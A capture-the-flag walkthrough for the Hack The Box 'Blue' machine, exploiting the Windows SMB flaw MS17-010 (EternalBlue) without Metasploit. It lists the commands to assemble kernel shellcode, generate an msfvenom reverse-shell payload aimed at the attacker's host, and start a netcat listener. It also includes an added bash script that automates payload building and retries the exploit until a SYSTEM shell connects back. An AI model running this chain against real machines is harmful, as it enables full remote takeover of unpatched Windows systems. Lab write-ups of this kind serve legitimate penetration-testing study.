Hack The Box - Blue Walkthrough without Metasploit

Enumeration

To enumerate the box we will use the following nmap command:

nmap -sC -sV -A 10.10.10.40

As we can see, port 445 (SMB) is open, and nmap's default scripts even disclose the exact build: Windows 7 Professional 7601 Service Pack 1. Let's run a second enumeration, this time with the vulnerability scripts:

We will be using two flags:

--script: selects which NSE scripts to run; "vuln" is the script category that checks the given ports of the box for known vulnerabilities.

-p: scans only the listed ports, in our case 445, since it is the only one we are currently interested in.

nmap --script vuln -p445 10.10.10.40

Something really interesting catches our eye: CVE-2017-0143 (MS17-010). A quick Google search...

Finding the Vulnerability

EternalBlue, with lots of Metasploit modules, but we will not fall into the temptation of using MSF (a really useful tool, but not our goal here).

Non Metasploit exploit

If we search a bit more we find this excellent GitHub repository. Let's clone it:

git clone https://github.com/3ndG4me/AutoBlue-MS17-010

There are several scripts in the folder. The first one we will use is eternal_checker.py, to confirm the box is actually vulnerable before throwing a kernel exploit at it:

python eternal_checker.py 10.10.10.40 -port 445

Exploitation

Generate a Payload

Now we navigate to the shellcode folder in order to generate our payload. This is done in two steps. First we assemble the kernel-mode shellcode, the part the exploit will run in ring 0:

nasm -f bin eternalblue_kshellcode_x64.asm -o evilKernel.bin

And now our msfvenom userland payload, a reverse shell. LHOST is our own VPN address and LPORT is the port our listener will sit on:

msfvenom -p windows/x64/shell_reverse_tcp EXITFUNC=thread LHOST=<Attacker-IP> LPORT=<Attacker-Port> -f raw -o evilReverse.bin

Now we have to join them, kernel shellcode first, since that is what the exploit jumps into and it then hands control to whatever follows it:

cat evilKernel.bin evilReverse.bin > evilPayload.bin

Executing the Exploit

First of all we need a netcat listener on the same port we gave msfvenom as LPORT (443 here), otherwise the reverse shell has nowhere to land:

nc -nvlp 443

Now we need to decide which Python script to use. Our previous enumeration showed that the target OS is Windows 7, so we pick the Windows 7 version of the exploit (eternalblue_exploit7.py in the repository; the Windows 8/2012 script uses a different code path and will not work here).

In order to run the exploit we need three parameters: the victim IP, the combined payload file, and numGroomConn, the number of connections used to groom the kernel pool so that the overflow lands on a controlled allocation.

Our first attempt failed. The right groom count is not deterministic, so we change the number of groom connections, increasing the value step by step, until we find one that works.
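The whole procedure above, wrapped into a retry loop, as an added example that is not part of the original walkthrough or of the AutoBlue repository: it assembles the kernel shellcode, generates the msfvenom reverse shell, joins them kernel-first with a size check, picks the exploit script from the OS string nmap reported, refuses to fire unless a listener is already up on LPORT, and then walks numGroomConn upward until an established connection shows up on that port. Assumptions: the AutoBlue checkout lives in $AUTOBLUE (default ./AutoBlue-MS17-010), the script names eternalblue_exploit7.py and eternalblue_exploit8.py follow the repository, and nasm, msfvenom, python, ss and timeout are on the path.

```shell
#!/usr/bin/env bash
# Added example, not part of the original walkthrough or the AutoBlue repo.
# Builds the kernel+userland payload and retries the EternalBlue exploit with
# an increasing numGroomConn until a reverse shell lands on our listener.
# Assumptions: AutoBlue-MS17-010 is checked out in $AUTOBLUE, and nasm,
# msfvenom, python, ss and timeout are installed.
set -u

AUTOBLUE="${AUTOBLUE:-$PWD/AutoBlue-MS17-010}"
SHELLCODE_DIR="$AUTOBLUE/shellcode"

# Map the OS string nmap's smb-os-discovery reported to the exploit script
# in the repository: the 7/2008 R2 and 8/2012 code paths differ, so the
# wrong one will not work even though both targets are MS17-010 vulnerable.
choose_exploit() {
    case "$1" in
        *"Windows 7"*|*"2008"*) echo "eternalblue_exploit7.py" ;;
        *"Windows 8"*|*"2012"*) echo "eternalblue_exploit8.py" ;;
        *) echo "no AutoBlue exploit script for: $1" >&2; return 1 ;;
    esac
}

# Concatenate kernel shellcode and userland payload, kernel part FIRST.
# The kernel stub is what the exploit jumps into in ring 0; it then hands
# control to whatever follows it (our msfvenom reverse shell).
build_payload() {
    local kernel="$1" user="$2" out="$3"
    [ -s "$kernel" ] || { echo "empty or missing kernel shellcode: $kernel" >&2; return 1; }
    [ -s "$user" ]   || { echo "empty or missing user payload: $user" >&2; return 1; }
    cat "$kernel" "$user" > "$out"
    # sanity check: the output must be exactly both inputs back to back
    local want=$(( $(wc -c < "$kernel") + $(wc -c < "$user") ))
    [ "$(wc -c < "$out")" -eq "$want" ]
}

# Something is listening on the port (before we fire) / connected (after).
port_listening() { ss -Hltn "( sport = :$1 )" 2>/dev/null | grep -q . ; }
shell_caught()   { ss -Htn state established "( sport = :$1 )" 2>/dev/null | grep -q . ; }

run_attack() {
    local target="$1" lhost="$2" lport="$3" osname="$4" max_groom="${5:-20}"
    local script kernel user payload
    script="$(choose_exploit "$osname")" || return 1
    kernel="$SHELLCODE_DIR/evilKernel.bin"
    user="$SHELLCODE_DIR/evilReverse.bin"
    payload="$SHELLCODE_DIR/evilPayload.bin"

    # the same two steps as in the walkthrough, then the concatenation
    nasm -f bin "$SHELLCODE_DIR/eternalblue_kshellcode_x64.asm" -o "$kernel" || return 1
    msfvenom -p windows/x64/shell_reverse_tcp EXITFUNC=thread \
        LHOST="$lhost" LPORT="$lport" -f raw -o "$user" || return 1
    build_payload "$kernel" "$user" "$payload" || return 1

    # a reverse shell with nobody listening just dies: insist on the listener
    # (nc -nvlp $lport in another terminal) before touching the target
    port_listening "$lport" || { echo "start 'nc -nvlp $lport' first" >&2; return 1; }

    local groom
    for groom in $(seq 1 "$max_groom"); do
        echo "[*] numGroomConn=$groom"
        # the exploit script exits after sending; the shell, if any, arrives at nc
        timeout 120 python "$AUTOBLUE/$script" "$target" "$payload" "$groom" || true
        sleep 5
        if shell_caught "$lport"; then
            echo "[+] connection established on :$lport with numGroomConn=$groom"
            return 0
        fi
    done
    echo "[-] no shell after $max_groom groom sizes; check LHOST/LPORT and whether the box crashed" >&2
    return 1
}

if [ "${1:-}" = "run" ]; then
    run_attack "$2" "$3" "$4" "$5" "${6:-20}"
else
    echo "usage: $0 run <target-ip> <LHOST> <LPORT> \"<nmap OS string>\" [max-groom]"
fi
```

Start nc -nvlp 443 in a second terminal, then run the script with run 10.10.10.40 <Attacker-IP> 443 "Windows 7 Professional 7601 Service Pack 1". A failed groom attempt can blue-screen the target, which is why the loop pauses between tries; if the box reboots, wait for port 445 to answer again before continuing.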

Pwnd

After a few tries, increasing the number of groom connections each time, we get a shell on our listener as NT AUTHORITY\SYSTEM, which is expected: the payload is launched from kernel shellcode, so there is no privilege escalation step left to do.
